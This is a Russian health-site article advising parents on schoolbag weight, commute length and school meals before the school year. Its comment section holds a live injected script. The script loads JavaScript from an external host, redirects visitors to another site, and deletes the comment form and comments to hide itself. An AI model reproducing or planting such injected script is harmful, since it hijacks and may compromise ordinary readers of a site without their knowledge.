Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пора в школу – 1  >>  Пора в школу – 1
 
Обратная связь
 

Пора в школу – 1

Размер шрифта
16 августа 2011 06:56
  • google_analytics: false
  • Нравится

Первое сентября не за горами, и родители уже отправились в магазины за ранцами и тетрадями. «Здоровье инфо» открывает цикл публикаций, который расскажет о том, на что следует обратить внимание, отдавая ребенка в школу.

1

Виктор Миронов/ «Здоровье инфо»

Сколько должен весить ранец?

Ранец – это не просто сумка, в которой ребенок носит учебники и тетрадки. Это фактически визитная карточка школьника. Вот почему дети так придирчиво относятся к таким, казалось бы, непринципиальным вещам, как рисунок на ранце. Родителям же стоит обратить внимание на другие аспекты.

Важно соизмерять вес ранца с возрастом школьника, чтобы он не оказался слишком тяжелым для ребенка. Особенно это касается родителей первоклассников.

Существуют специальные рекомендации Роспотребнадзора, касающиеся этого вопроса. Вес ежедневного комплекта учебников и письменных принадлежностей не должен превышать: для учащихся 1-2-х классов – более 1,5 кг, 3-4-х классов – 2 кг; 5-6-х – 2,5 кг, 7-8-х – 3,5 кг, 9-11-х – более 4 кг, говорится в постановлении, которое недавно приняли наши чиновники. Эти рекомендации примерно исходят из веса ребенка в том или ином возрасте. Однако вес у детей (особенно в период взросления) может быть разным, поэтому стоит также учитывать рекомендации ортопедов. По мнению медиков, оптимальная нагрузка с учетом веса ребенка должна выглядеть так:

  • ранец с ортопедической спинкой (вес ранца до 1250 г) – до 15% от массы тела ребенка
  • ранец с уплотненной спинкой (вес ранца до 850 г) – до 10% от массы тела ребенка
  • мягкий рюкзак (вес ранца до 500 г) – до 7% от массы тела ребенка.

То есть – в более тяжелый рюкзак вмещается больше груза. Чрезмерные нагрузки на ребенка могут грозить повышенной утомляемостью.

Долгий путь к знаниям

1

Не всегда и не у всех родителей есть возможность провожать ребенка в школу. Между тем для ребенка, особенно младшего школьного возраста, это может быть существенной проблемой.

Если школьник идет к месту получения знаний пешком, то важно, чтобы дорога занимала у него не больше 15-20 минут с учетом темпа ходьбы. И не только потому, что ребенок не должен утомляться физически. Долгая дорога до школы может утомлять и морально. А в этом, возможно, скрыта причина прогулов – школьнику будет просто лень далеко ходить.

Если ребенок добирается до школы на общественном транспорте, то нужно оценить количество, степень удобства транспорта и протяженность маршрута. Он тоже не должен превышать 20 минут. Строго рекомендуется в первый год обучения в школе провожать и встречать ребенка из школы до тех пор, пока вы не убедитесь, что он способен уверенно делать это без вашей помощи.

Кормить или не кормить?

Вопрос питания в школе заслуживает отдельной публикации (которая в ближайшее время появится на нашем сайте), но имеет смысл обратить внимание на некоторые аспекты.

  • Если вы сами готовите ребенку школьный завтрак, то обращайте пристальное внимание на то, чтобы в нем не содержались скоропортящиеся продукты. Это касается, в том числе, и такого популярного компонента завтраков на скорую руку, как колбасы. Недавние исследования показали, что негативное действие бактерий на мясо при комнатной температуре проявляется уже в течение полутора часов.
  • Если ребенок питается в школе, то вряд ли стоит беспокоиться за то, что питание может оказаться вредным. То, чем кормят детей в образовательных учреждениях, обычно довольно жестко контролируется. Но нужно выяснить, нет ли у ребенка аллергии на те или иные продукты, чтобы скорректировать его рацион в случае необходимости.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.